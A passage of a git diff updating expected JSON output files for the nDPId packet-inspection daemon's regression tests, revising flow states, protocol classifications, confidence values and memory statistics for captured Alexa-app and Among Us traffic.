00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976085883,"flow_last_seen":1490976149040,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"10.201.126.241","src_port":40242,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1490976082723,"flow_last_seen":1490976084872,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5020,"flow_avg_l4_payload_len":251,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34053,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976082964,"flow_last_seen":1490976084873,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34054,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1490976090572,"flow_last_seen":1490976094931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":12466,"flow_avg_l4_payload_len":415,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34069,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976100559,"flow_last_seen":1490976107681,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34073,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} 
-00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} +00698{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1490976100811,"flow_last_seen":1490976107676,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7423,"flow_avg_l4_payload_len":337,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34074,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 
+00828{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":99,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1490976093358,"flow_last_seen":1490976194991,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":7317,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"176.32.101.52","src_port":44001,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976024793,"flow_last_seen":1490976024844,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":75,"flow_tot_l4_payload_len":122,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":3440,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"}} 
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976027522,"flow_last_seen":1490976027523,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":52603,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by 
port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976085891,"flow_last_seen":1490976085978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38434,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
-00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} -00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
+00955{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976027567,"flow_last_seen":1490976028006,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":1437,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"173.194.223.188","src_port":42878,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 
+00829{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1490976029248,"flow_last_seen":1490976152630,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":12350,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":150,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976195545,"flow_last_seen":1490976195628,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":128,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":40425,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 
+00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1490976080485,"flow_last_seen":1490976081484,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":282,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38404,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976198776,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}} 00580{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3435,"source":"alexa-app.pcapng","alias":"nDPId-test","packets-captured":3435,"packets-processed":3406,"total-skipped-flows":0,"total-l4-payload-len":1226087,"total-not-detected-flows":0,"total-guessed-flows":14,"total-detected-flows":146,"total-detection-updates":141,"total-updates":2,"current-active-flows":0,"total-active-flows":160,"total-idle-flows":160,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":1075,"global_ts_msec":1490976198776} ~~~~~~~~~~~~~~~~~~~~ 
SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 3435/3406 @@ -1081,9 +1081,9 @@ ~~ total active/idle flows...: 160/160 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 6590189 bytes -~~ total memory freed........: 6590189 bytes -~~ total allocations/frees...: 122905/122905 +~~ total memory allocated....: 6723795 bytes +~~ total memory freed........: 6723795 bytes +~~ total allocations/frees...: 125666/125666 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 189 chars ~~ json string max len.......: 2122 chars diff --git a/test/results/among_us.pcap.out b/test/results/among_us.pcap.out index b464270a3..4fdb44392 100644 --- a/test/results/among_us.pcap.out +++ b/test/results/among_us.pcap.out 
@@ -2,8 +2,8 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":946681200000} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946681200000,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":57,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":57,"pkt_l4_len":23,"thread_ts_msec":946681200000,"pkt":"eJS0JASgYDjgxTWgCABFAAArJhEAAH8RqpAKAAABrGn7qvsEVgcAF2toCAABAIDZAgMGQUFBQUFB"} 
-00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1,"source":"among_us.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946681200000,"flow_last_seen":946681200000,"flow_idle_time":200000,"flow_min_l4_payload_len":15,"flow_max_l4_payload_len":15,"flow_tot_l4_payload_len":15,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":946681200000,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.105.251.170","src_port":64260,"dst_port":22023,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AmongUs","breed":"Fun","category":"Game"}} 